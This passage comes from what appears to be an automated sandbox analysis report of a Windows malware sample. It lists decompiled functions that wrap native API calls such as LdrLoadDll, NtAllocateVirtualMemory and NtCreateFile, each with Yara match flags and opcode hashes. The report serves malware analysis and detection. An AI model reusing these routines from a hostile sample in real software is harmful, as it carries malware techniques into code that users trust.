					_t17 = E0041AF60(__eflags, _v8);
					_t32 = _t31 + 4;
					__eflags = _t17;
					if(_t17 != 0) {
						E0041B1E0( &_v12, 0);
						_t32 = _t32 + 8;
					}
					_t18 = E004192F0(_v8);
					_v16 = _t18;
					__eflags = _t18;
					if(_t18 == 0) {
						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
						return _v16;
					}
					return _t18;
				} else {
					return _t15;
				}
			}













                                                                              0x00409b2c
                                                                              0x00409b2f
                                                                              0x00409b34
                                                                              0x00409b39
                                                                              0x00409b43
                                                                              0x00409b48
                                                                              0x00409b4b
                                                                              0x00409b4d
                                                                              0x00409b55
                                                                              0x00409b5a
                                                                              0x00409b5a
                                                                              0x00409b61
                                                                              0x00409b69
                                                                              0x00409b6c
                                                                              0x00409b6e
                                                                              0x00409b82
                                                                              0x00000000
                                                                              0x00409b84
                                                                              0x00409b8a
                                                                              0x00409b3e
                                                                              0x00409b3e
                                                                              0x00409b3e

                                                                              APIs
                                                                              • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00409B82
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.250995157.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Load
                                                                              • String ID:
                                                                              • API String ID: 2234796835-0
                                                                              • Opcode ID: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
                                                                              • Instruction ID: 046ff59bb8e44ad8641c0e43070f5aeaf3db9792b4ffc4f87dfb9ba9f6fb7e9c
                                                                              • Opcode Fuzzy Hash: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
                                                                              • Instruction Fuzzy Hash: D70112B5D4010DB7DF10EAE5DC42FDEB378AB54318F1041A5E908A7281F635EB54C795
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 004181B0, Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 100%
                                                                              			E004181B0(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				long _t21;
				void* _t31;

				_t3 = _a4 + 0xc40; // 0xc40
				E00418DB0(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t21;
			}





                                                                              0x004181bf
                                                                              0x004181c7
                                                                              0x004181fd
                                                                              0x00418201

                                                                              APIs
                                                                              • NtCreateFile.NTDLL(00000060,00408AE3,?,00413B87,00408AE3,FFFFFFFF,?,?,FFFFFFFF,00408AE3,00413B87,?,00408AE3,00000060,00000000,00000000), ref: 004181FD
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.250995157.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CreateFile
                                                                              • String ID:
                                                                              • API String ID: 823142352-0
                                                                              • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                                              • Instruction ID: 1505d2c2fac7169f29cf6ab97caa2a59105c471fc85729d0552dd22f4c6ed161
                                                                              • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                                              • Instruction Fuzzy Hash: D7F0B6B2200208ABCB48CF89DC85DEB77ADAF8C754F158248BA0D97241C630E8518BA4
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0041838B, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 64%
                                                                              			E0041838B(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t14;
				void* _t21;

				asm("sbb al, 0xab");
				asm("fisubr dword [edx-0x1374aaac]");
				_t10 = _a4;
				_t3 = _t10 + 0xc60; // 0xca0
				E00418DB0(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t14;
			}





                                                                              0x0041838b
                                                                              0x0041838d
                                                                              0x00418393
                                                                              0x0041839f
                                                                              0x004183a7
                                                                              0x004183c9
                                                                              0x004183cd

                                                                              APIs
                                                                              • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,00418F84,?,00000000,?,00003000,00000040,00000000,00000000,00408AE3), ref: 004183C9
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.250995157.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: AllocateMemoryVirtual
                                                                              • String ID:
                                                                              • API String ID: 2167126740-0
                                                                              • Opcode ID: e925053f86c05f5fb4b0b2fb8cc6689b729dd8d10ef6bb8a80f2b56ebb5274c5
                                                                              • Instruction ID: 73b80116c2f0aa312eb484c462c33686b2ba2de7f18ec796e0b79ebf6884a435
                                                                              • Opcode Fuzzy Hash: e925053f86c05f5fb4b0b2fb8cc6689b729dd8d10ef6bb8a80f2b56ebb5274c5
                                                                              • Instruction Fuzzy Hash: B8F01CB6201108AFDB54DF99DC81EE777A9EF88354F118549FE0897241C630E811CBA4
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 00418390, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 100%
                                                                              			E00418390(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t14;
				void* _t21;

				_t3 = _a4 + 0xc60; // 0xca0
				E00418DB0(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t14;
			}





                                                                              0x0041839f
                                                                              0x004183a7
                                                                              0x004183c9
                                                                              0x004183cd

                                                                              APIs
                                                                              • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,00418F84,?,00000000,?,00003000,00000040,00000000,00000000,00408AE3), ref: 004183C9
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.250995157.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: AllocateMemoryVirtual
                                                                              • String ID:
                                                                              • API String ID: 2167126740-0
                                                                              • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                                              • Instruction ID: c1f36b05bbd4b7963809c3793a6f2df241a2ee7dc34c60eca979b2d1d68cf477
                                                                              • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                                              • Instruction Fuzzy Hash: 1DF015B2200208ABCB14DF89DC81EEB77ADAF88754F118149BE0897241CA30F810CBE4
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 004182DA, Relevance: 1.5, APIs: 1, Instructions: 23nativeCOMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 100%
                                                                              			E004182DA(void* __eax, void* __ecx, intOrPtr _a8, void* _a12) {
				long _t12;
				void* _t18;

				_t9 = _a8;
				_t5 = _t9 + 0x10; // 0x300
				_t6 = _t9 + 0xc50; // 0x409733
				E00418DB0(_t18, _a8, _t6,  *_t5, 0, 0x2c);
				_t12 = NtClose(_a12); // executed
				return _t12;
			}





                                                                              0x004182e3
                                                                              0x004182e6
                                                                              0x004182ef
                                                                              0x004182f7
                                                                              0x00418305
                                                                              0x00418309

                                                                              APIs
                                                                              • NtClose.NTDLL(00413D20,?,?,00413D20,00408AE3,FFFFFFFF), ref: 00418305
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.250995157.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Close
                                                                              • String ID:
                                                                              • API String ID: 3535843008-0
                                                                              • Opcode ID: 4c3c248844b78758760fbdb0a201d5043adc8340b02b26c0bcbcbf2afb23922d
                                                                              • Instruction ID: 1f3b181c670607d11befed56111bda4796acd929acf14a18ec04b659a5850319
                                                                              • Opcode Fuzzy Hash: 4c3c248844b78758760fbdb0a201d5043adc8340b02b26c0bcbcbf2afb23922d
                                                                              • Instruction Fuzzy Hash: C5E026712002006FD710DBA88C45FDB3B54DF44220F20419DFA5C9B2C2C531E5428294
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 004182E0, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 100%
                                                                              			E004182E0(intOrPtr _a4, void* _a8) {
				long _t8;
				void* _t11;

				_t5 = _a4;
				_t2 = _t5 + 0x10; // 0x300
				_t3 = _t5 + 0xc50; // 0x409733
				E00418DB0(_t11, _a4, _t3,  *_t2, 0, 0x2c);
				_t8 = NtClose(_a8); // executed
				return _t8;
			}





                                                                              0x004182e3
                                                                              0x004182e6
                                                                              0x004182ef
                                                                              0x004182f7
                                                                              0x00418305
                                                                              0x00418309

                                                                              APIs
                                                                              • NtClose.NTDLL(00413D20,?,?,00413D20,00408AE3,FFFFFFFF), ref: 00418305
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.250995157.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Close
                                                                              • String ID:
                                                                              • API String ID: 3535843008-0
                                                                              • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                                              • Instruction ID: 2c2b34aedc846ab3ae484734a1171ee081eb0df99b6426d3cac892bcac86a451
                                                                              • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                                              • Instruction Fuzzy Hash: 7CD012752003146BD710EF99DC45ED7775CEF44750F154459BA185B242C930F90086E4
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 00A498F0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.251888254.00000000009E0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: 6064978d5b080e1ac775bfc0465342ed2542abf0c7954ff6afefc78c22a72080
                                                                              • Instruction ID: 3679f56db154f20b125b2ee624a088cf27215c8a369a8f6811c3a0c659b85df9
                                                                              • Opcode Fuzzy Hash: 6064978d5b080e1ac775bfc0465342ed2542abf0c7954ff6afefc78c22a72080
                                                                              • Instruction Fuzzy Hash: 3990026160100503D21271694404616000AE7D0382F91C032A5014555ECA7589D6F171
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 00A49860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.251888254.00000000009E0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: faa097405b0419847c69ad85ac6349b67c135c29094579ef36bbcf15086a3347
                                                                              • Instruction ID: 21c54deca697b2ded1517e8e1738f7315810da786e900ad234c2aa2cb91c91dc
                                                                              • Opcode Fuzzy Hash: faa097405b0419847c69ad85ac6349b67c135c29094579ef36bbcf15086a3347
                                                                              • Instruction Fuzzy Hash: DA90027120100413D222616945047070009E7D0382F91C422A4414558D96A68996F161
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 00A49840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.251888254.00000000009E0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: c296d7cc227b860dcb26b43edf4d7323719ee8a72d2a24e1f134581d41709b8f
                                                                              • Instruction ID: 41887b8759142fbb3d7f1feb8a98236d473b17719def4235c2a79c670be888c7
                                                                              • Opcode Fuzzy Hash: c296d7cc227b860dcb26b43edf4d7323719ee8a72d2a24e1f134581d41709b8f
                                                                              • Instruction Fuzzy Hash: 17900261242041535656B16944045074006F7E0382791C022A5404950C8576989AE661
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 00A499A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.251888254.00000000009E0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: 85996a527967fcb2325f3aba3c2b71e16d3bb73aa64ee26a2deaeff0e4ffcf37
                                                                              • Instruction ID: 1feb496b191fc441b15c9f44a378969dd7f4dd2a3fa43bc79c875e267a888c90
                                                                              • Opcode Fuzzy Hash: 85996a527967fcb2325f3aba3c2b71e16d3bb73aa64ee26a2deaeff0e4ffcf37
                                                                              • Instruction Fuzzy Hash: 3B9002A134100443D21161694414B060005E7E1342F51C025E5054554D8669CC96B166
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 00A49910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.251888254.00000000009E0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: 3a597ed6de40e24d65db6b3613f8c92b6cf8c32f140659bfd95cd28af14cb1a4
                                                                              • Instruction ID: cd18590575c2b322f46f28179e48b638b62d154e3f57e717e1138a8122dace73
                                                                              • Opcode Fuzzy Hash: 3a597ed6de40e24d65db6b3613f8c92b6cf8c32f140659bfd95cd28af14cb1a4
                                                                              • Instruction Fuzzy Hash: 2B9002B120100403D251716944047460005E7D0342F51C021A9054554E86A98DD9B6A5
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 00A49A20, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.251888254.00000000009E0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: 484818f7ac1a7f44c7c6a895d238a616824eb6d48482aaa261acf5391329c5ac
                                                                              • Instruction ID: 395bf6263286ad70b641d49cb16516253b58af2615c1288a40097d6e6d3034c8
                                                                              • Opcode Fuzzy Hash: 484818f7ac1a7f44c7c6a895d238a616824eb6d48482aaa261acf5391329c5ac
                                                                              • Instruction Fuzzy Hash: C3900261601000434251717988449064005FBE1352751C131A4988550D85A988A9A6A5
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 00A49A00, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.251888254.00000000009E0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: f8503e72e1dc65af4ca0ce9addbf57eb335d904996dba7031ef9584864db2d12
                                                                              • Instruction ID: a6f67a8277a3b3be8b89b917850b13e78702fe5dd5bedc71adf87a0afe52c33f
                                                                              • Opcode Fuzzy Hash: f8503e72e1dc65af4ca0ce9addbf57eb335d904996dba7031ef9584864db2d12
                                                                              • Instruction Fuzzy Hash: 8490027120140403D2116169481470B0005E7D0343F51C021A5154555D86758895B5B1
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 00A49A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.251888254.00000000009E0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: ca7bd9f394ae9b964a3cac70d481b3340606d3e811df99ef0a54e8aea18af5ec
                                                                              • Instruction ID: 64d2cfaf13f9309bcd7403859deaf896cc2873968d7599671b0a295e5d50db3c
                                                                              • Opcode Fuzzy Hash: ca7bd9f394ae9b964a3cac70d481b3340606d3e811df99ef0a54e8aea18af5ec
                                                                              • Instruction Fuzzy Hash: FC90026121180043D31165794C14B070005E7D0343F51C125A4144554CC96588A5A561
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 00A495D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.251888254.00000000009E0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: e35e0022b6cdbdab7016df3c7a659f72f9d9a7478746fa8472fed56286336965
                                                                              • Instruction ID: 08c33894a5ed7cb2586842ca04486c4597f6e0c3905499bcde100bcd11c8e5f2
                                                                              • Opcode Fuzzy Hash: e35e0022b6cdbdab7016df3c7a659f72f9d9a7478746fa8472fed56286336965
                                                                              • Instruction Fuzzy Hash: 0D9002A120200003421671694414616400AE7E0342B51C031E5004590DC57588D5B165
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 00A49540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.251888254.00000000009E0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: 172c38909e115b066a6124b9cc0e1afc9d2dd833fa4fbbce887c8884f8c0d43c
                                                                              • Instruction ID: 1315aa69fdc5ae92524b7a957cf78082d5d3c7872c89ceafb40b3329d7236b15
                                                                              • Opcode Fuzzy Hash: 172c38909e115b066a6124b9cc0e1afc9d2dd833fa4fbbce887c8884f8c0d43c
                                                                              • Instruction Fuzzy Hash: 75900265211000030216A56907045070046E7D5392351C031F5005550CD67188A5A161
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 00A496E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.251888254.00000000009E0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: 6f35625760975cb278921bc5e890fbe3bc0c1561eeac67e4772e375d796f345e
                                                                              • Instruction ID: f1994b6a4f452d4f91f2f1e37c547d66f4cd1f9836b374957a5211878604265d
                                                                              • Opcode Fuzzy Hash: 6f35625760975cb278921bc5e890fbe3bc0c1561eeac67e4772e375d796f345e
                                                                              • Instruction Fuzzy Hash: 0890027120108803D2216169840474A0005E7D0342F55C421A8414658D86E588D5B161
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 00A49660, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.251888254.00000000009E0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: 0501d3d0434ed8d4f2c6a1d4e5734e5ab884dd6bf5aafc99480ac9560ea2329a
                                                                              • Instruction ID: 82818c37d7a7e9e8cb6d625da2237b27d33e1dddfe8bbaa70537b02e9c407086
                                                                              • Opcode Fuzzy Hash: 0501d3d0434ed8d4f2c6a1d4e5734e5ab884dd6bf5aafc99480ac9560ea2329a
                                                                              • Instruction Fuzzy Hash: 3F90027120100803D2917169440464A0005E7D1342F91C025A4015654DCA658A9DB7E1
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 00A497A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.251888254.00000000009E0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: 15f40edd31ee3081fac04602dd034eecbd0caa10db686763f8378a05b6436114
                                                                              • Instruction ID: 39b11731bdff199837e062ce116313473b0146bb55da1fdd5054dad37b832a5f
                                                                              • Opcode Fuzzy Hash: 15f40edd31ee3081fac04602dd034eecbd0caa10db686763f8378a05b6436114
                                                                              • Instruction Fuzzy Hash: 7690026130100003D251716954186064005F7E1342F51D021E4404554CD965889AA262
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 00A49780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.251888254.00000000009E0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: 4cc1a055ef5ad7ffbb4182ab6a3324b9cdb2ae385965ac26bc009718ca027027
                                                                              • Instruction ID: f455264d3e230fdaa5da93997a6747d008b443e26f4d11623bc6616487098b57
                                                                              • Opcode Fuzzy Hash: 4cc1a055ef5ad7ffbb4182ab6a3324b9cdb2ae385965ac26bc009718ca027027
                                                                              • Instruction Fuzzy Hash: 2890026921300003D2917169540860A0005E7D1343F91D425A4005558CC96588ADA361
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 00A49FE0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.251888254.00000000009E0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: 97061f5890ea04ace6c2b4ecc42d50a00c9cc56b1110d23329624cd140ae34d0
                                                                              • Instruction ID: 5648b87f03e205912434b748b2a8678bc994c3f78523e6e99c13484dcec24f85
                                                                              • Opcode Fuzzy Hash: 97061f5890ea04ace6c2b4ecc42d50a00c9cc56b1110d23329624cd140ae34d0
                                                                              • Instruction Fuzzy Hash: A190027131114403D221616984047060005E7D1342F51C421A4814558D86E588D5B162
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 00A49710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.251888254.00000000009E0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: 9ee7eadea693d9cebcf30fbf16ecfb24366f1ee7395257516ad07c91ad2ecad4
                                                                              • Instruction ID: ce6b1a714e862e6b33b3a65d62e18ad929d5c69ff1b880c89aa1bdfe96938745
                                                                              • Opcode Fuzzy Hash: 9ee7eadea693d9cebcf30fbf16ecfb24366f1ee7395257516ad07c91ad2ecad4
                                                                              • Instruction Fuzzy Hash: 0F90027120100403D21165A954086460005E7E0342F51D021A9014555EC6B588D5B171
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 004088A0, Relevance: .1, Instructions: 92COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.250995157.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 283bf2c7f344e97b91bcc60d13a5b0e411dcd70c841c71c3deed8c9853ae10d6
                                                                              • Instruction ID: 5568bf364e599ab98db8d6cec98c55b42aa716c8f34da205b899e6f8c2a7a87e
                                                                              • Opcode Fuzzy Hash: 283bf2c7f344e97b91bcc60d13a5b0e411dcd70c841c71c3deed8c9853ae10d6
                                                                              • Instruction Fuzzy Hash: EF213CB2C4420857CB20E6649D42BFF73BC9B50304F44057FE989A3181F638BB498BA6
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 00407260, Relevance: 1.6, APIs: 1, Instructions: 55threadwindowCOMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 82%
                                                                              			E00407260(void* __eflags, intOrPtr _a4, long _a8) {
				char _v67;
				char _v68;
				void* _t12;
				intOrPtr* _t13;
				int _t14;
				long _t21;
				intOrPtr* _t25;
				void* _t26;
				void* _t30;

				_t30 = __eflags;
				_v68 = 0;
				E00419D10( &_v67, 0, 0x3f);
				E0041A8F0( &_v68, 3);
				_t12 = E00409B10(_t30, _a4 + 0x1c,  &_v68); // executed
				_t13 = E00413E20(_a4 + 0x1c, _t12, 0, 0, 0xc4e7b6d6);
				_t25 = _t13;
				if(_t25 != 0) {
					_t21 = _a8;
					_t14 = PostThreadMessageW(_t21, 0x111, 0, 0); // executed
					_t32 = _t14;
					if(_t14 == 0) {
						_t14 =  *_t25(_t21, 0x8003, _t26 + (E00409270(_t32, 1, 8) & 0x000000ff) - 0x40, _t14);
					}
					return _t14;
				}
				return _t13;
			}












                                                                              0x00407260
                                                                              0x0040726f
                                                                              0x00407273
                                                                              0x0040727e
                                                                              0x0040728e
                                                                              0x0040729e
                                                                              0x004072a3
                                                                              0x004072aa
                                                                              0x004072ad
                                                                              0x004072ba
                                                                              0x004072bc
                                                                              0x004072be
                                                                              0x004072db
                                                                              0x004072db
                                                                              0x00000000
                                                                              0x004072dd
                                                                              0x004072e2

                                                                              APIs
                                                                              • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072BA
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000001.216382055.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: MessagePostThread
                                                                              • String ID:
                                                                              • API String ID: 1836367815-0
                                                                              • Opcode ID: 205fda5ff18a58da29b4ee771503f4b4c431d8485573b34ca04b666bda837a67
                                                                              • Instruction ID: ed9c0dd32f68776d22a62b6ccf8dda9c2c93357863a303a75fe51d199eec68b3
                                                                              • Opcode Fuzzy Hash: 205fda5ff18a58da29b4ee771503f4b4c431d8485573b34ca04b666bda837a67
                                                                              • Instruction Fuzzy Hash: DE018431A8032876E720A6959C03FFE776C5B40B55F15416EFF04BA1C2E6A87D0646EA
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 004184B2, Relevance: 1.5, APIs: 1, Instructions: 31memoryCOMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 43%
                                                                              			E004184B2(void* __eax, void* __edi, intOrPtr _a9, void* _a13, long _a17, void* _a21) {
				char _t12;
				void* _t18;

				asm("sahf");
				_pop(_t19);
				_t18 = __edi - 1;
				asm("insb");
				asm("fstp9 st2");
				asm("adc al, 0x55");
				_t9 = _a9;
				_t3 = _t9 + 0xc74; // 0xc74
				E00418DB0(_t18, _a9, _t3,  *((intOrPtr*)(_a9 + 0x10)), 0, 0x35);
				_t12 = RtlFreeHeap(_a13, _a17, _a21); // executed
				return _t12;
			}





                                                                              0x004184b2
                                                                              0x004184b3
                                                                              0x004184b5
                                                                              0x004184b6
                                                                              0x004184bc
                                                                              0x004184be
                                                                              0x004184c3
                                                                              0x004184cf
                                                                              0x004184d7
                                                                              0x004184ed
                                                                              0x004184f1

                                                                              APIs
